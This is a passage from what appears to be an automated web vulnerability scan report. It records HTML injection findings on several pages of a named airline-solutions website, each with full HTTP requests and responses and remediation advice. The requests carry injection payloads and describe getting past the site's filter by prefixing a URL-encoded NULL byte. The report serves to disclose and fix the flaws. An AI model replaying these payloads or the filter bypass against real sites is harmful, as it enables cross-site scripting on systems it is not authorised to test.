Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323016; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:10:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323016; expires=Thu, 06-Oct-2011 06:10:05 GMT; path=/
Set-Cookie: exp_last_activity=1286363404; expires=Thu, 06-Oct-2011 06:10:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fmore_customers%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:11:05 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/airline_reservations/more_customers/?%00f85dc"><a>dfdeaf77316=1">
...[SNIP]...

3.125. http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/more_customers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %009bfb0<a>05937178652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9bfb0<a>05937178652 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/airline_reservations/more_customers/?%009bfb0<a>05937178652=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323016; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:16:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323016; expires=Thu, 06-Oct-2011 06:16:42 GMT; path=/
Set-Cookie: exp_last_activity=1286363802; expires=Thu, 06-Oct-2011 06:16:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fmore_customers%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:17:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33494


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>05937178652=1">?%009bfb0<a>05937178652=1</a>
...[SNIP]...

3.126. http://www.sabreairlinesolutions.com/home/products_services/customer_sales_service [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/customer_sales_service

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00adecf"><a>1bef3683590 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as adecf"><a>1bef3683590 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/customer_sales_service?%00adecf"><a>1bef3683590=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:34:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318063; expires=Wed, 05-Oct-2011 17:34:23 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:34:37 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21566


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/airline_reservations?%00adecf"><a>1bef3683590=1">
...[SNIP]...

3.127. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/aircentre_technology/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/aircentre_technology/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001e795<a>24403cf9831 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e795<a>24403cf9831 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/enterprise_operations/aircentre_technology/?%001e795<a>24403cf9831=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:31:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322346; expires=Thu, 06-Oct-2011 03:32:04 GMT; path=/
Set-Cookie: exp_last_activity=1286353924; expires=Thu, 06-Oct-2011 03:32:04 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:32:09 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22145


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>24403cf9831=1">?%001e795<a>24403cf9831=1</a>
...[SNIP]...

3.128. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/control_cost

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005cbdc<a>f318e8866e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cbdc<a>f318e8866e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/enterprise_operations/control_cost?%005cbdc<a>f318e8866e=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323070; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A4%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:25:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323070; expires=Thu, 06-Oct-2011 03:25:41 GMT; path=/
Set-Cookie: exp_last_activity=1286353541; expires=Thu, 06-Oct-2011 03:25:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A54%3A%22%2Fproducts_services%2Fenterprise_operations%2Fcontrol_cost%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Fsabre_revenue_integrity%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fdownloads%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A4%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:25:51 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33751


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>f318e8866e=1">control cost?%005cbdc<a>f318e8866e=1</a>
...[SNIP]...

3.129. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00149e5<a>f1657a73226 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 149e5<a>f1657a73226 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/enterprise_operations/downloads?%00149e5<a>f1657a73226=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:25:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323049; expires=Thu, 06-Oct-2011 03:26:12 GMT; path=/
Set-Cookie: exp_last_activity=1286353572; expires=Thu, 06-Oct-2011 03:26:12 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fenterprise_operations%2Fdownloads%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:26:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>f1657a73226=1">downloads?%00149e5<a>f1657a73226=1</a>
...[SNIP]...

3.130. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/my_list/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006d37f"><a>2a4fc9af41d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d37f"><a>2a4fc9af41d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/enterprise_operations/my_list/?%006d37f"><a>2a4fc9af41d=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:19:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322346; expires=Thu, 06-Oct-2011 03:19:43 GMT; path=/
Set-Cookie: exp_last_activity=1286353183; expires=Thu, 06-Oct-2011 03:19:43 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:19:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/enterprise_operations/my_list/?%006d37f"><a>2a4fc9af41d=1">
...[SNIP]...

3.131. http://www.sabreairlinesolutions.com/home/products_services/marketing_planning [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/marketing_planning

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fb6b0"><a>8510af1fb38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb6b0"><a>8510af1fb38 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/marketing_planning?%00fb6b0"><a>8510af1fb38=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:39:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286318361; expires=Wed, 05-Oct-2011 17:39:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts_services%2Fcommercial_planning%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:39:32 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21427


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/commercial_planning?%00fb6b0"><a>8510af1fb38=1">
...[SNIP]...

3.132. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_acars_manager/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e5318"><a>81d14d067ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5318"><a>81d14d067ea in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product/sabre_aircentre_acars_manager/?%00e5318"><a>81d14d067ea=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
